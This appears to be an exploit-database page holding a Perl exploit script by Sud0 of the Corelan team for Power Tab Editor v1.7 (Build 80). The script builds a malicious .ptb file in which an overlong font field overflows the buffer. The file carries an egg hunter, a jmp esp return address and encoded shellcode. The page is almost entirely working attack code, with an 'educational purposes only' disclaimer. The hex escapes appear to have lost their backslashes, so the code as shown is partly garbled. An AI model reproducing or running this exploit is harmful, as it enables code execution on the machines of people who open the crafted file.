[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Power Tab Editor v1.7 (Build 80) Buffer Overflow
# Published : 2010-06-11
# Author : Sud0
# Previous Title : Rosoft Audio Converter 4.4.4 Buffer Overflow
# Next Title : Buffer Overflow ActivePerl v5.8.8.817
#***********************************************************************************
# Exploit Title : Power Tab Editor v1.7 (Build 80)
# Date : 07/06/2010
# Author : Sud0
# Bug found by : Sud0
# Software Link : http://www.power-tab.net/guitar.php
# Version : v1.7 (Build 80)
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : EIP / SEH
# Thanks to my wife for her support
# Congratz to markot for his new baby Manuel
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
print "|------------------------------------------------------------------|n";
print "| __ __ |n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |n";
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |n";
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |n";
print "| |n";
print "| http://www.corelan.be:8800 |n";
print "| |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[+] Exploit for Power Tab Editor v1.7 b80n";
my $filename="poc.ptb";
my $junk = "x20" x 463;
my $footer = "x08x00x00x00x90x01x00x00x00x00x00x00x00x00x00x0F".
"x54x69x6Dx65x73x20x4Ex65x77x20x52x6Fx6Dx61x6Ex08".
"x00x00x00x90x01x00x00x00x00x00x00x00x00x00x0Fx54".
"x69x6Dx65x73x20x4Ex65x77x20x52x6Fx6Dx61x6Ex08x00".
"x00x00x90x01x00x00x00x00x00x00x00x00x00x09x00x00".
"x00x00x00x00x00x00x00x00x00";
my $egg= "x66x81xCAxFFx0Fx42x52x6Ax43x58xCDx2Ex3Cx05x5Ax74xEFxB8x77x30x30x74x8BxFAxAFx75xEAxAFx75xE7xFFxE7";
my $buffer = "ptab" . "x04x00x00x00xFFxCFx01"; # File Header
$buffer .= $junk ;
$buffer .= "x00x00x02x00xDAx07x00x00x00x00x00x00x00x00x00x00" ; # basic config for ptb file
$buffer .= "x00x01x00xFFxFFx01x00x07x00x43x47x75x69x74x61x72" ; # basic config for ptb file
$buffer .= "x00x08x55x6Ex74x69x74x6Cx65x64x18x68x40x00x00x00" ; # basic config for ptb file
$buffer .= "x00x00x08x53x74x61x6Ex64x61x72x64x01x06x40x3Bx37" ; # basic config for ptb file
$buffer .= "x32x2Dx28x00x00x00x00x01x00xFFxFFx01x00x09x00x43" ; # basic config for ptb file
$buffer .= "x47x75x69x74x61x72x49x6Ex00x00x00x00x00x01x00x00" ; # basic config for ptb file
$buffer .= "x00x00x00x00x01x00xFFxFFx01x00x08x00x43x53x65x63" ; # basic config for ptb file
$buffer .= "x74x69x6Fx6Ex32x00x00x00x14x00x00x00x20x03x00x00" ; # basic config for ptb file
$buffer .= "x8Fx00x00x00x00x14x00x00x00x00x00x10x00x80x11x1A" ; # basic config for ptb file
$buffer .= "x04x7Fx00x00x00x00x00x00x00x01x00xFFxFFx01x00x06" ; # basic config for ptb file
$buffer .= "x00x43x53x74x61x66x66x06x09x09x11x00x00x00x00x00" ; # basic config for ptb file
$buffer .= "x00x00x01x00x01x80x00x08x55x6Ex74x69x74x6Cx65x64" ; # basic config for ptb file
$buffer .= "x21x68x40x00x00x00x00x00x04x42x61x73x73x01x04x2B" ; # basic config for ptb file
$buffer .= "x26x21x1Cx00x00x00x00x01x00x03x80x00x00x00x00x00" ; # basic config for ptb file
$buffer .= "x01x00x00x00x00x00x00x01x00x05x80x32x00x00x00x14" ; # basic config for ptb file
$buffer .= "x00x00x00x20x03x00x00x7Dx00x00x00x00x14x00x00x00" ; # basic config for ptb file
$buffer .= "x00x00x10x00x80x11x1Ax04x7Fx00x00x00x00x00x00x00" ; # basic config for ptb file
$buffer .= "x01x00x07x80x14x09x09x11x00x00x00x00x00x00x00x05" ; # basic config for ptb file
$buffer .= "Arial" . "A" x 18; # Font here where the Buffer Overflow occures
$buffer .= $egg;
$buffer .= "A" x 18; # some junk
$buffer .= "xDCx3AxB4x76"; # jmp esp from winmm.dll may be changed
$buffer .= "x90" x 4; # somz NOPs
$buffer .= "xEBxC4" ; # Jump Backward to egg bunter
$buffer .= "xccx00x36x00"; # ptb file separator
$buffer .= "A" x 918; # some junk
$buffer .= $footer; # ptb file footer
$shellcode = "w00tw00t" . "WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIhYjKMKn92Ta4kDDqXRX2qjp1KyPdLKqadpnkaf4LNkrVELLKsvUXnkcNgPnk6VvXroWhrUJSv931N1kOiqSPLKRLtd5tNkcuWLlKPTWupxvakZNkpJWhnkSjgP5QJKxcVW1YNkVTLKEQxnfQ9oP1kpylnLK4kpT4WzYQZoVm5Qjg9yZQKOyoKOEkqlVDQ81eknLK1JUtS1zKSVlKvlpKNkRzwlwqJKnk7tLKc1KXoyStQ4eLE1iSOBwxeyKdOyhelIKrQxlNRntNzLPRixMLiokOkONiRewtmkcNkhkRQcLGeL6D0RM8NkyokOKOniSu38qxPl2LUpkO58Ucp2fNqt3XSEt32ESBOxQLWTtJOyJFv6KOSeFdLIYRRpoKnHMr2mmlmWWlutpRkX3nKOkOkOqxPLQQBnPXu8csRoV2W5VQyKNh1LTdUWoyHcPh2USUBLbxsXUp0MU1pnsX3RrO2U2T2HROT45ppa3XPmsQSBu3QxUprTrOUp1x2RcQRT2ZqxU3bORNQwu8qcwPFZUpphGPpsQq493XRs2UQtvPEayYoxpLutVKMYHaFQKbqB63PQ629oJp6QIPBpYoruWxWzA";
$buffer .=$shellcode;
print "Removing old $filename filen";
system("del $filename");
print "Creating new $filename filen";
open(FILE, ">$filename");
print FILE $buffer;
close(FILE);